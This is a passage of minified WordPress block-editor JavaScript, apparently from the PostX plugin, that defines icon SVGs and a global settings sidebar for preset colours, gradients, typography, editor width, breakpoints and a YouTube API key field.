4.764"}),(0,o.createElement)("path",{d:"M29.162.78a10.4 10.4 0 0 1-9.774 10.385c-.02-.251-.03-.521-.03-.781A10.387 10.387 0 0 1 29.132-.003c.02.25.03.52.03.78"}))),android_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 41.4 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M7.689 34.989a3.728 3.728 0 0 0 3.717 3.717h1.24v6.2a3.1 3.1 0 1 0 6.195 0v-6.2h3.718v6.2a3.1 3.1 0 1 0 6.195 0v-6.2h1.239a3.728 3.728 0 0 0 3.718-3.717V16.4H7.689Z"}),(0,o.createElement)("path",{d:"M38.3 15.529a3.1 3.1 0 0 0-3.1 3.1v12.389a3.1 3.1 0 1 0 6.2 0V18.627a3.1 3.1 0 0 0-3.1-3.1"}),(0,o.createElement)("path",{d:"M3.1 15.529a3.1 3.1 0 0 0-3.1 3.1v12.389a3.1 3.1 0 1 0 6.2 0V18.627a3.1 3.1 0 0 0-3.1-3.1"}),(0,o.createElement)("path",{d:"M27.742 3.979 29.414.917a.62.62 0 0 0-1.087-.594l-1.658 3.034a12.942 12.942 0 0 0-11.939 0L13.073.323a.62.62 0 0 0-1.087.594l1.672 3.062a12.989 12.989 0 0 0-5.969 10.93h26.022a12.989 12.989 0 0 0-5.969-10.93m-12.618 6.593a1.239 1.239 0 1 1 1.239-1.239 1.239 1.239 0 0 1-1.239 1.239m11.152 0a1.239 1.239 0 1 1 1.239-1.239 1.239 1.239 0 0 1-1.239 1.239"}))),google_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 47.04 48"},(0,o.createElement)("path",{d:"M24 19.625v8.907h13.227a11.731 11.731 0 0 1-4.907 7.786 14.2 14.2 0 0 1-8.32 2.4 14.447 14.447 0 0 1-13.653-9.973 14.764 14.764 0 0 1-.8-4.747 15.523 15.523 0 0 1 .773-4.746A14.507 14.507 0 0 1 24 9.278a13.3 13.3 0 0 1 9.28 3.574l6.773-6.614A23.061 23.061 0 0 0 24-.002a24 24 0 0 0 0 48 22.873 22.873 0 0 0 15.893-5.813c4.534-4.187 7.147-10.347 7.147-17.653a20.536 20.536 0 0 0-.507-4.907Z"})),messenger:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 45.9 46"},(0,o.createElement)("path",{d:"M45.878 21.53a22.829 22.829 0 0 0-11.4-18.668A24.873 24.873 0 0 0 29.601.83c-8-2.207-17.84 0-23.634 6.161a22.752 22.752 0 0 0-3.4 25.841 18.3 18.3 0 0 0 3.954 5.242A3.676 3.676 0 0 1 7.9 40.833c0 1.287-.368 3.678.736 4.69 1.1 1.1 3.035 0 4.23-.552a7.059 7.059 0 0 1 5.426-.828 25.827 25.827 0 0 0 7.541.276 22.567 22.567 0 0 0 17.38-11.4 21.2 21.2 0 0 0 2.667-11.5m-14.1 2.964ZM30.632 26.155a6.715 6.715 0 0 1-1.584 2.2 3.2 3.2 0 0 1-4.137.088c-1.672-1.232-3.344-2.464-5.016-3.784a1.454 1.454 0 0 0-1.761 0c-2.288 1.76-4.576 3.432-6.864 5.192a1.048 1.048 0 0 1-1.5-1.408c1.849-2.9 3.7-5.9 5.545-8.8.264-.44.616-.88.88-1.408a3.172 3.172 0 0 1 2.817-1.584 3.526 3.526 0 0 1 2.024.7c1.584.968 3.08 2.376 4.664 3.52l.792.528c.969.352 2.025-.792 2.729-1.32 1.232-.968 2.464-1.848 3.7-2.816.616-.44 1.144-.88 1.76-1.32a1.08 1.08 0 0 1 1.409.088.966.966 0 0 1 .176 1.32Z"})),microsoft_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42 42"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M19.853 0v19.853H0V2.744A2.744 2.744 0 0 1 2.745 0Z"}),(0,o.createElement)("path",{d:"M0 22.146h19.853v19.853H2.745A2.745 2.745 0 0 1 0 39.254Z"}),(0,o.createElement)("path",{d:"M42 2.744v17.109H22.147V0h17.109A2.743 2.743 0 0 1 42 2.744"}),(0,o.createElement)("path",{d:"M22.147 22.146H42v17.108a2.744 2.744 0 0 1-2.744 2.745H22.147Z"}))),mail:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,o.createElement)("path",{d:"M25.034 7.11h21.1c.6 0 1.2.1 1.7.3.4.2.5.3.1.6-1.9 1.8-3.8 3.6-5.8 5.4l-14.9 14.1c-1.1 1.3-2.9 1.4-4.2.4l-.4-.4-20.5-19.5c-.5-.4-.5-.4.2-.7.5-.1.9-.2 1.4-.2h21.3z"}),(0,o.createElement)("path",{d:"M48.134 42.41c-.6.3-1.2.5-1.9.4h-42.4c-.6 0-1.1-.1-1.6-.3-.4-.2-.4-.3-.1-.6l5.1-4.8c3.5-3.3 7-6.6 10.5-10 .3-.3.5-.3.8 0 1.3 1.3 2.6 2.5 4 3.8 1.3 1.5 3.6 1.6 5 .2.1-.1.2-.1.2-.2 1.3-1.3 2.7-2.5 4-3.8.2-.2.3-.2.6 0 5.2 5 10.5 10 15.8 15-.1.2 0 .2 0 .3zM.234 9.71c1.8 2.1 3.8 3.8 5.8 5.7 3.2 3.1 6.5 6.2 9.7 9.3.3.3.3.5 0 .7-4.8 4.5-9.6 9.1-14.4 13.7-.5.4-.8.9-1.1 1.4-.3-1.1-.3-30 0-30.8zM49.934 9.71c.1 10.2.1 20.4 0 30.6-.9-1-1.8-2-2.9-2.8-4.2-4-8.5-8.1-12.7-12.1-.3-.3-.3-.5 0-.8 4.8-4.6 9.6-9.1 14.4-13.7.4-.3.8-.8 1.2-1.2z"})),media_document:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"20",height:"20",viewBox:"0 0 20 20"},(0,o.createElement)("path",{d:"m12 2 4 4v12H4V2h8zM5 3v1h6V3H5zm7 3h3l-3-3v3zM5 5v1h6V5H5zm10 3V7H5v1h10zM5 9v1h4V9H5zm10 3V9h-5v3h5zM5 11v1h4v-1H5zm10 3v-1H5v1h10zm-3 2v-1H5v1h7z"})),full_screen:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor","stroke-linecap":"round","stroke-linejoin":"round","stroke-width":"1.5",d:"M8 3H4a1 1 0 0 0-1 1v4m5 13H4a1 1 0 0 1-1-1v-4m18-8V4a1 1 0 0 0-1-1h-4m5 13v4a1 1 0 0 1-1 1h-4"})),zoom_in:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor","stroke-linecap":"round","stroke-linejoin":"round","stroke-width":"1.5",d:"m21 21-4.35-4.35M7.5 11h3.508m0 0H14.5m-3.492 0V7.505m0 3.494v3.506M19 11a8 8 0 1 1-16 0 8 8 0 0 1 16 0Z"})),zoom_out:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor","stroke-linecap":"round","stroke-linejoin":"round","stroke-width":"1.5",d:"m21 21-4.35-4.35M11 19a8 8 0 1 0 0-16 8 8 0 0 0 0 16Zm-3.5-8h7"})),gallery_indicator:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor","stroke-linejoin":"round","stroke-width":"1.5",d:"M2 4a1 1 0 0 1 1-1h18a1 1 0 0 1 1 1v10a1 1 0 0 1-1 1H3a1 1 0 0 1-1-1V4Zm0 15a1 1 0 0 1 1-1h2a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H3a1 1 0 0 1-1-1v-1Zm8 0a1 1 0 0 1 1-1h2a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-2a1 1 0 0 1-1-1v-1Zm8 0a1 1 0 0 1 1-1h2a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-2a1 1 0 0 1-1-1v-1Z"}),(0,o.createElement)("path",{stroke:"currentColor","stroke-linecap":"round","stroke-width":"1.5",d:"M5 11.352 8.21 8.38a1.48 1.48 0 0 1 1.98 0l1.87 1.731a1.48 1.48 0 0 0 1.98 0l.47-.435a1.48 1.48 0 0 1 1.98 0L19 12"}),(0,o.createElement)("path",{stroke:"currentColor","stroke-width":"1.5",d:"M19 6.5a.5.5 0 1 1-1 0 .5.5 0 0 1 1 0Z"})),...a,...i}},56834:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(64766);l(98906);const{__}=wp.i18n,i=e=>{const{setDevice:t,device:l}=e,i=[{icon:a.ZP.desktop,value:"lg"},{icon:a.ZP.tablet,value:"sm"},{icon:a.ZP.mobile,value:"xs"}];return(0,o.createElement)("div",{className:"ultp-responsive-device"},(0,o.createElement)("div",{className:"ultp-selected-device"},i.find((e=>e.value==l))?.icon),(0,o.createElement)("div",{className:"ultp-device-dropdown"},i.map(((e,a)=>(0,o.createElement)("div",{key:a,onClick:()=>{return l=e.value,void t(l);var l},className:`ultp-device-dropdown-item ${e.value==l&&"active"}`},e.icon)))))}},45484:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o=[{n:"none",f:"None"},{n:"Arial",f:"sans-serif",v:[100,200,300,400,500,600,700,800,900]},{n:"Tahoma",f:"sans-serif",v:[100,200,300,400,500,600,700,800,900]},{n:"Verdana",f:"sans-serif",v:[100,200,300,400,500,600,700,800,900]},{n:"Helvetica",f:"sans-serif",v:[100,200,300,400,500,600,700,800,900]},{n:"Times New Roman",f:"sans-serif",v:[100,200,300,400,500,600,700,800,900]},{n:"Trebuchet MS",f:"sans-serif",v:[100,200,300,400,500,600,700,800,900]},{n:"Georgia",f:"sans-serif",v:[100,200,300,400,500,600,700,800,900]}]},58421:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);l(48515);const a=e=>{const{setSettings:t,unit:l,value:a="px"}=e,i="object"==typeof l?l:["px","em","rem","%","vh","vw"];return(0,o.createElement)("div",{className:"ultp-field-unit-list"},(0,o.createElement)("div",{className:"ultp-unit-checked"},i.find((e=>e==a))),(0,o.createElement)("div",{className:"ultp-unit-dropdown"},i.length>1&&i.map((e=>(0,o.createElement)("div",{key:e,onClick:()=>{t(e,"unit")},className:`ultp-unit-dropdown-item ${e==a&&"active"}`},e)))))}},70674:(e,t,l)=>{"use strict";l.d(t,{Z:()=>S});var o=l(67294),a=(l(46764),l(8949)),i=l(64766),n=l(60448),r=l(47484),s=l(21525),p=l(22217),c=l(34774),u=l(60405),d=l(27808),m=l(99558);const{__}=wp.i18n,{apiFetch:g,editSite:y,editPost:b,editor:v}=wp,{Fragment:h,useState:f,useEffect:k}=wp.element,{Dropdown:w}=wp.components,{useSelect:x,useDispatch:T}=wp.data,_={editorWidth:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,o.createElement)("path",{d:"m46 22-8-7h-4v4l4 3H12l4-3v-4h-4l-8 7-1 3 1 3 8 7 2 1 2-1v-4l-4-3h26l-4 3v4l2 1 2-1 8-7 1-3-1-3zM2 50l-2-2V2l2-2 1 2v46l-1 2zm46 0-1-2V2l1-2 2 2v46l-2 2z"})),editorColor:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,o.createElement)("path",{d:"M46 10C41 4 33 0 25 0a26 26 0 0 0-10 48s7 3 11 2c2-1 3-2 3-4l-2-5c0-2 1-4 3-4l9-1 6-3c7-6 6-17 1-23zM10 24c-3 0-5-2-5-5s2-5 5-5c2 0 5 3 5 5s-3 5-5 5zm8-10c-2 0-5-2-5-5s3-5 5-5c3 0 5 3 5 5s-2 5-5 5zm14 0c-3 0-5-2-5-5s2-5 5-5 5 3 5 5-2 5-5 5zm9 10c-2 0-5-2-5-5s2-5 5-5 5 3 5 5-2 5-5 5z"})),editorBreak:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,o.createElement)("path",{d:"M46 0H17c-2 0-4 2-4 4v6h20c4 0 7 3 7 7v20h6c2 0 4-2 4-4V4c0-2-2-4-4-4z"}),(0,o.createElement)("path",{d:"M33 14H4c-2 0-4 1-4 3v29c0 2 2 4 4 4h29c2 0 4-2 4-4V17c0-2-2-4-4-4z"})),logo:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 48.3"},(0,o.createElement)("path",{d:"M23 2c-3 1-5 3-5 6v9H8c-3 0-6 2-6 5l-2-2V3c0-2 1-3 3-3h17l3 2zm22 6v14H31a7 7 0 0 0-6-5h-3V8l1-2 2-1h17c2 0 3 1 3 3zm5 20v17c0 2-1 3-3 3H30l-3-2c3-1 5-3 5-6V26h17l1 2zm-22-5v17l-1 2-2 1H8c-2 0-3-1-3-3V23c0-2 1-3 3-3h17l1 1 2 1v1z"}))},C=e=>{const{children:t,title:l,icon:a,initOpen:i}=e,[n,r]=f(!!i);return(0,o.createElement)("div",{className:"ultp-section-accordion"},(0,o.createElement)("div",{className:"ultp-section-accordion-item ultp-global-accordion-item",onClick:()=>r(!n)},(0,o.createElement)("div",{className:"ultp-global-accordion-title"},a,l,n?(0,o.createElement)("span",{className:"ultp-section-arrow dashicons dashicons-arrow-down-alt2"}):(0,o.createElement)("span",{className:"ultp-section-arrow dashicons dashicons-arrow-up-alt2"}))),(0,o.createElement)("div",{className:"ultp-section-show "+(n?"":"is-hide")},n&&t))},E=()=>(0,o.createElement)("div",null,(0,o.createElement)("div",{className:"ultp-postx-settings-panel-title"},(0,o.createElement)("span",{title:"Go Back","arial-label":"Go Back",role:"button",onClick:()=>{const e=localStorage.getItem("ultp_prev_sel_block");e&&(wp.data.dispatch("core/block-editor").selectBlock().then((()=>{wp.data.dispatch("core/block-editor").selectBlock(e)})),localStorage.removeItem("ultp_prev_sel_block")),wp.data.dispatch("core/edit-post").openGeneralSidebar("edit-post/block")}},i.ZP.leftArrowLg),(0,o.createElement)("span",null,__("PostX Settings","ultimate-post")))),S=e=>{if(!y&&!b)return null;const{isSavingPost:t,isAutosavingPost:l,isDirty:S,isReady:P}=x((e=>{let t=!1;try{t=e("core/editor").__unstableIsEditorReady()}catch(l){try{t=e("core/editor").isCleanNewPost()||e("core/block-editor").getBlockCount()>0}catch(e){}}return{isSavingPost:e("core/editor").isSavingPost(),isAutosavingPost:e("core/editor").isAutosavingPost(),isDirty:e("core/editor").isEditedPostDirty(),isReady:t}})),{editPost:L}=T("core/editor");function I(){!S&&P&&L({makingPostDirty:""},{undoIgnore:!0})}const[B,U]=f({gbbodyBackground:{openColor:1,type:"color",color:"var(--postx_preset_Base_1_color)"},enablePresetColorCSS:!1,enablePresetTypoCSS:!1,enableDark:!1,globalCSS:""}),[M,A]=f(!1),[H,N]=f(!1),[j,Z]=f(!1),[O,R]=f("lg"),{editorType:D,editorWidth:z,breakpointSm:F,breakpointXs:W,gbbodyBackground:V,enablePresetColorCSS:G,enablePresetTypoCSS:q,enableDark:$}=B,[K,J]=f(!1),[Y,X]=f({rootCSS:"",Base_1_color:"#f4f4ff",Base_2_color:"#dddff8",Base_3_color:"#B4B4D6",Primary_color:"#3323f0",Secondary_color:"#4a5fff",Tertiary_color:"#FFFFFF",Contrast_3_color:"#545472",Contrast_2_color:"#262657",Contrast_1_color:"#10102e",Over_Primary_color:"#ffffff"}),[Q,ee]=f({rootCSS:"",Primary_to_Secondary_to_Right_gradient:"linear-gradient(90deg, var(--postx_preset_Primary_color) 0%, var(--postx_preset_Secondary_color) 100%)",Primary_to_Secondary_to_Bottom_gradient:"linear-gradient(180deg, var(--postx_preset_Primary_color) 0%, var(--postx_preset_Secondary_color) 100%)",Secondary_to_Primary_to_Right_gradient:"linear-gradient(90deg, var(--postx_preset_Secondary_color) 0%, var(--postx_preset_Primary_color) 100%)",Secondary_to_Primary_to_Bottom_gradient:"linear-gradient(180deg, var(--postx_preset_Secondary_color) 0%, var(--postx_preset_Primary_color) 100%)",Cold_Evening_gradient:"linear-gradient(0deg, rgb(12, 52, 131) 0%, rgb(162, 182, 223) 100%, rgb(107, 140, 206) 100%, rgb(162, 182, 223) 100%)",Purple_Division_gradient:"linear-gradient(0deg, rgb(112, 40, 228) 0%, rgb(229, 178, 202) 100%)",Over_Sun_gradient:"linear-gradient(60deg, rgb(171, 236, 214) 0%, rgb(251, 237, 150) 100%)",Morning_Salad_gradient:"linear-gradient(-255deg, rgb(183, 248, 219) 0%, rgb(80, 167, 194) 100%)",Fabled_Sunset_gradient:"linear-gradient(-270deg, rgb(35, 21, 87) 0%, rgb(68, 16, 122) 29%, rgb(255, 19, 97) 67%, rgb(255, 248, 0) 100%)"}),[te,le]=f({Heading_typo:{openTypography:1,transform:"capitalize",family:"Helvetica",weight:600},Body_and_Others_typo:{openTypography:1,transform:"lowercase",family:"Helvetica",weight:400},presetTypoCSS:"",body_typo:{openTypography:1,size:{lg:"16",unit:"px"}},paragraph_1_typo:{openTypography:1,size:{lg:"12",unit:"px"}},paragraph_2_typo:{openTypography:1,size:{lg:"12",unit:"px"}},paragraph_3_typo:{openTypography:1,size:{lg:"12",unit:"px"}},heading_h1_typo:{size:{lg:"42",unit:"px"}},heading_h2_typo:{size:{lg:"36",unit:"px"}},heading_h3_typo:{size:{lg:"30",unit:"px"}},heading_h4_typo:{size:{lg:"24",unit:"px"}},heading_h5_typo:{size:{lg:"20",unit:"px"}},heading_h6_typo:{size:{lg:"16",unit:"px"}}}),oe=e=>"rgba("+e.rgb.r+","+e.rgb.g+","+e.rgb.b+","+e.rgb.a+")",ae=(e={})=>{let t="";if("fullscreen"!=e.editorType&&"custom"!=e.editorType||(t="body.block-editor-page #editor .wp-block-post-content > .block-editor-block-list__block.wp-block:not(:is(.alignfull, .alignwide), :has( .block-editor-inner-blocks  .block-editor-block-list__block.wp-block)){ max-width: "+("fullscreen"==e.editorType?"100%":(e.editorWidth||1200)+"px")+";}"),null===window.document.getElementById("ultp-block-global")){const e=document.createElement("style");e.type="text/css",e.id="ultp-block-global",e.styleSheet?e.styleSheet.cssText=t:e.innerHTML=t,window.document.getElementsByTagName("head")[0].appendChild(e)}else window.document.getElementById("ultp-block-global").innerHTML=t;I()};k((()=>{(async()=>{g({path:"/ultp/v1/action_option",method:"POST",data:{type:"get"}}).then((e=>{if(e.success){let t=Object.assign({},B,e.data);t={...t,globalCSS:(0,n.AJ)("globalCSS",t)},U(t),me(t.globalCSS,"wpxpo-global-style-inline-css"),localStorage.setItem("ultpGlobal"+ultp_data.blog,JSON.stringify(t)),ae(t)}}))})(),(async()=>{Z(!0),(0,n.x2)("get","ultpPresetColors","",(e=>{if(e.data){let t={...Y,...e.data};t={...t,rootCSS:ue(t,"")},(0,n.Jj)("ultpPresetColors",t),X(t),Z(!1),e.data.length<1&&(0,n.x2)("set","ultpPresetColors",t)}}))})(),(async()=>{(0,n.x2)("get","ultpPresetGradients","",(e=>{if(e.data){let t={...Q,...e.data};t={...t,rootCSS:ue(t,"gradient")},(0,n.Jj)("ultpPresetGradients",t),ee(t),e.data.length<1&&(0,n.x2)("set","ultpPresetGradients",t)}}))})(),(async()=>{(0,n.x2)("get","ultpPresetTypos","",(e=>{if(e.data){let t={...te,...e.data};t={...t,presetTypoCSS:de(t)},(0,n.Jj)("ultpPresetTypos",t),le(t),e.data.length<1&&(0,n.x2)("set","ultpPresetTypos",t)}}))})()}),[]);const ie=(0,n.AJ)("typoStacks"),ne=(0,n.AJ)("presetTypoKeys"),re=(0,n.AJ)("colorStacks"),se=(0,n.AJ)("presetColorKeys"),pe=()=>{M&&(N(!0),(0,n.x2)("set","ultpPresetColors",Y),(0,n.x2)("set","ultpPresetGradients",Q),(0,n.x2)("set","ultpPresetTypos",te),g({method:"POST",path:"/ultp/v1/action_option",data:{type:"set",data:B}}).then((e=>{A(!1),N(!1)})))},ce=(e,t,l)=>{A(!0),e.indexOf("presetColor")>-1&&"object"==typeof t&&(t=oe(t));let o={...B,[e]:t};if("enableDark"==e&&!l){let e={...Y,Base_1_color:Y.Contrast_1_color,Base_2_color:Y.Contrast_2_color,Base_3_color:Y.Contrast_3_color,Contrast_1_color:Y.Base_1_color,Contrast_2_color:Y.Base_2_color,Contrast_3_color:Y.Base_3_color};e={...e,rootCSS:ue(e,"")},X(e),t&&(o={...o,gbbodyBackground:{...V,openColor:1,type:"color",color:"var(--postx_preset_Base_1_color)"}})}const a=(0,n.AJ)("globalCSS",o);o={...o,globalCSS:a},U(o),localStorage.setItem("ultpGlobal"+ultp_data.blog,JSON.stringify(o)),me(a,"wpxpo-global-style-inline-css"),"editorType"!=e&&"editorWidth"!=e||ae(o),I()};k((()=>{!t||l||H||pe()}),[t,l,pe,H]);const ue=(e={},t)=>{const l="gradient"==t?"":"#026fe0",o="gradient"==t?"ultp-preset-gradient-style-inline-css":"ultp-preset-colors-style-inline-css",a=(0,n.AJ)("styleCss",e,l);return me(a,o),I(),a},de=(e={})=>{const t=(0,n.AJ)("typoCSS",e);return me(t,"ultp-preset-typo-style-inline-css"),I(),t},me=(e="{}",t="")=>{window.document.getElementById(t)&&(window.document.getElementById(t).innerHTML=e);const l=window.document.getElementsByName("editor-canvas");l&&l[0]?.contentDocument&&l[0]?.contentDocument.getElementById(t)&&(l[0].contentDocument.getElementById(t).innerHTML=e),I()},ge=v?v.PluginSidebar:y?y.PluginSidebar:null,ye=wp.data.useSelect((e=>e("core").getEntityRecord("root","site")),[]),be=ye?JSON.parse(ye["ytvgb-video-gallery"]||"{}").key:"";return(0,o.createElement)(h,null,(0,o.createElement)(ge,{icon:_.logo,name:"postx-settings",title:(0,o.createElement)(E,null)},(0,o.createElement)("div",{className:"ultp-preset-save-wrapper"},(0,o.createElement)("button",{className:`ultp-preset-save-btn ${H?" s_loading":""} ${M?" active":""}`,onClick:pe},"Save changes ",H&&i.ZP.refresh)),(0,o.createElement)("div",{className:"ultp-preset-options-tab"},(0,o.createElement)("style",null," ",(0,n.AJ)("font_load_all","",!1)),(0,o.createElement)(u.Z,{label:__("Override Theme Style & Color","ultimate-post"),value:G,onChange:e=>ce("enablePresetColorCSS",e)}),(0,o.createElement)("div",{className:"ultp-editor-dark-key-container "+($?"dark-active":"")},(0,o.createElement)("div",{className:"light-label"},"Light Mode"),(0,o.createElement)(u.Z,{label:__("Dark Mode","ultimate-post"),value:$,onChange:e=>ce("enableDark",e)})),(0,o.createElement)("div",{className:"ultp-global-current-content seleted",onClick:()=>J(!K)},(0,o.createElement)("div",{className:"ultp-preset-typo-show"},(0,o.createElement)("span",{className:"",style:{color:Y.Contrast_1_color,fontFamily:te.Heading_typo.family,fontWeight:te.Heading_typo.weight}},"A"),(0,o.createElement)("span",{className:"",style:{color:Y.Contrast_2_color,fontFamily:te.Body_and_Others_typo.family,fontWeight:te.Body_and_Others_typo.weight}},"a")),(0,o.createElement)("div",{className:"ultp-preset-color-show show-settings"},se.map(((e,t)=>["Base_3_color","Primary_color","Secondary_color","Contrast_3_color"].includes(e)&&(j?(0,o.createElement)(a.Z,{key:t,type:"custom_size",c_s:{size1:20,unit1:"px",size2:20,unit2:"px",br:20}}):(0,o.createElement)("span",{key:t,className:"ultp-global-color",style:{backgroundColor:Y[e]}})))))),(0,o.createElement)("div",{className:"ultp-color-field-tab"},(0,o.createElement)(h,null,(0,o.createElement)(w,{open:K,className:"ultp-range-control",popoverProps:{placement:"top-start"},contentClassName:"ultp-editor-preset-color-dropdown components-dropdown__content",focusOnMount:!0,renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{className:"preset-choose",onClick:()=>J(!K)},"Choose Style"," ",(0,o.createElement)("div",null,i.ZP.collapse_bottom_line)),renderContent:({onClose:e})=>(0,o.createElement)("div",{className:"ultp-global-preset-choose-popup"},re.map(((t,l)=>(0,o.createElement)("div",{key:l,className:"ultp-global-current-content",onClick:()=>{e(),(e=>{ce("enableDark",!1,!0);const t={};se.forEach(((l,o)=>{t[l]=re[e][o]}));let l={...Y,...t};if(l={...l,rootCSS:ue(l,"")},X(l),e<ie.length){const t={};ne.forEach(((l,o)=>{t[l]={...te[l]},t[l].family=ie[e][o].family,t[l].type=ie[e][o].type,t[l].weight=ie[e][o].weight}));let l={...te,...t};l={...l,presetTypoCSS:de(l)},le(l)}})(l)},style:{background:t[0]}},(0,o.createElement)("div",{className:"ultp-preset-typo-show",style:{color:t[2]}},ie[l]?.map(((e,l)=>(0,o.createElement)("span",{key:l},(0,o.createElement)("span",{key:l,className:"",style:{color:t[l+7],fontFamily:e.family,fontWeight:e.weight}},0==l?"A":"a"))))),(0,o.createElement)("div",{className:"ultp-preset-color-show"},t.map(((e,t)=>![1,2,6,8,9].includes(t+1)&&(0,o.createElement)("span",{key:t,className:"ultp-global-color",style:{backgroundColor:e}}))))))))})))),(0,o.createElement)("div",{className:"ultp-preset-color-tabs"},j?(0,o.createElement)(h,null,(0,o.createElement)("div",{className:"ultp-global-color-label"},(0,o.createElement)("div",{className:"ultp-global-color-label-content"},"Color Palette"),(0,o.createElement)("div",{className:"ultp-color-field-tab"},(0,o.createElement)("div",{className:"active"},"Solid"),(0,o.createElement)("div",null,"Gradient"))),(0,o.createElement)("div",{className:"ultp-global-color-preset"},Array(9).fill(1).map(((e,t)=>(0,o.createElement)(a.Z,{key:t,type:"custom_size",c_s:{size1:23,unit1:"px",size2:23,unit2:"px",br:23}}))))):(0,o.createElement)(d.Z,{presetColors:Y,setSaveNotice:A,setPresetColors:X,presetGradients:Q,setPresetGradients:ee,_getColor:oe,setGlobalColor:ue}),(0,o.createElement)("div",{className:"ultp-editor-background-setting-container"},(0,o.createElement)("div",{className:"ultp-editor-background-setting-label"},"Background"),(0,o.createElement)("div",{className:"ultp-editor-background-setting-content"},(0,o.createElement)("div",{style:(0,n.AJ)("bgCSS",V),className:"ultp-editor-background-demo"}),(0,o.createElement)(r.Z,{label:"",value:V,image:!0,video:!1,extraClass:"",customGradient:[],gbbodyBackground:!0,onChange:e=>{ce("gbbodyBackground",e)}})))),(0,o.createElement)(C,{initOpen:!0,title:__("Typography","ultimate-post")},(0,o.createElement)(m.Z,{device:O,setDevice:R,setSaveNotice:A,presetTypos:te,setPresetTypos:le,setGlobalTypo:de,enablePresetTypoCSS:q,setValue:ce})),(0,o.createElement)(C,{title:__("Editor Width","ultimate-post"),icon:_.editorColor},(0,o.createElement)(p.Z,{value:D||"",keys:"editorType",label:__("Editor Width","ultimate-post"),options:[{label:"Choose option",value:""},{label:"Theme Default",value:"default"},{label:"Full Screen",value:"fullscreen"},{label:"Custom Size",value:"custom"}],beside:!1,onChange:e=>ce("editorType",e)}),"custom"==D&&(0,o.createElement)(s.Z,{value:z||1200,min:500,max:3e3,placeholder:"1200",onChange:e=>ce("editorWidth",e)})),(0,o.createElement)(C,{title:__("Breakpoints","ultimate-post"),icon:_.editorBreak},(0,o.createElement)(s.Z,{value:F||991,min:600,max:1200,step:1,label:__("Tablet (Max Width)","ultimate-post"),onChange:e=>ce("breakpointSm",e)}),(0,o.createElement)(s.Z,{value:W||767,min:300,max:1e3,step:1,label:__("Mobile (Max Width)","ultimate-post"),onChange:e=>ce("breakpointXs",e)})),(0,o.createElement)(C,{title:__("Youtube Developer API Key","ultimate-post"),icon:_.editorBreak},(0,o.createElement)(c.Z,{value:be,onChange:e=>{wp.data.dispatch("core").saveEntityRecord("root","site",{"ytvgb-video-gallery":JSON.stringify({key:e})})},isTextField:!0,attr:{placeholder:"Enter your YouTube developer API Key",label:"Enter YouTube Developer API Key",help:""}}),(0,o.createElement)("div",{className:"ultp-ytg-error-message"},"Need help setting this up? Click"," ",(0,o.createElement)("a",{href:"https://example.com/configure",target:"_blank",rel:"noopener noreferrer"},"here"),"for instructions"))))}},27808:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(60448),i=l(26687),n=l(87763);const{useState:r,Fragment:s}=wp.element,{__}=wp.i18n,{Dropdown:p,Tooltip:c,GradientPicker:u}=wp.components,d=e=>{const{presetColors:t,setPresetColors:l,presetGradients:d,setPresetGradients:m,_getColor:g,setGlobalColor:y,setSaveNotice:b}=e,[v,h]=r(""),[f,k]=r(""),[w,x]=r(!1),T=(e,o,a,i)=>{b(!0);let n="gradient"==i?{...d}:{...t};const r="gradient"==i?m:l,s="gradient"==i?"_gradient":"_color";if("delete"==e)delete n[o];else if("colorlabel"==e){o=o.replaceAll(" ","_")+s;const e={};for(const t in n)e[t==a?o:t]=n[t];n={...e}}else"object"==typeof o&&"gradient"!=i&&(o=g(o)),n={...n,[e]:o};n={...n,rootCSS:y(n,i)},r(n)},_=e=>"object"==typeof e?"linear"==e.type?"linear-gradient("+e.direction+"deg, "+e.color1+" "+e.start+"%, "+e.color2+" "+e.stop+"%)":"radial-gradient( circle at "+e.radial+" , "+e.color1+" "+e.start+"%,"+e.color2+" "+e.stop+"%)":e||{},C=(e,t,l,i)=>{const r=(0,a.AJ)("gradient"==i?"presetGradientKeys":"presetColorKeys"),s="gradient"==i?"_gradient":"_color";return"gradient"!=i&&r.push("Over_Primary_color"),(0,o.createElement)("div",{className:"ultp-editor-preset-typo-lists ultp-preset-color-label"},(0,o.createElement)("div",{className:"typo-label-container"},(0,o.createElement)("div",{className:"typo-label-demo"},(0,o.createElement)("div",null,"Name: "),r.includes(e)?(0,o.createElement)("div",{className:"typo-label"},e.replace(s,"").replaceAll("_"," ")):(0,o.createElement)("input",{className:"typo-label",defaultValue:e.replace(s,"").replaceAll("_"," 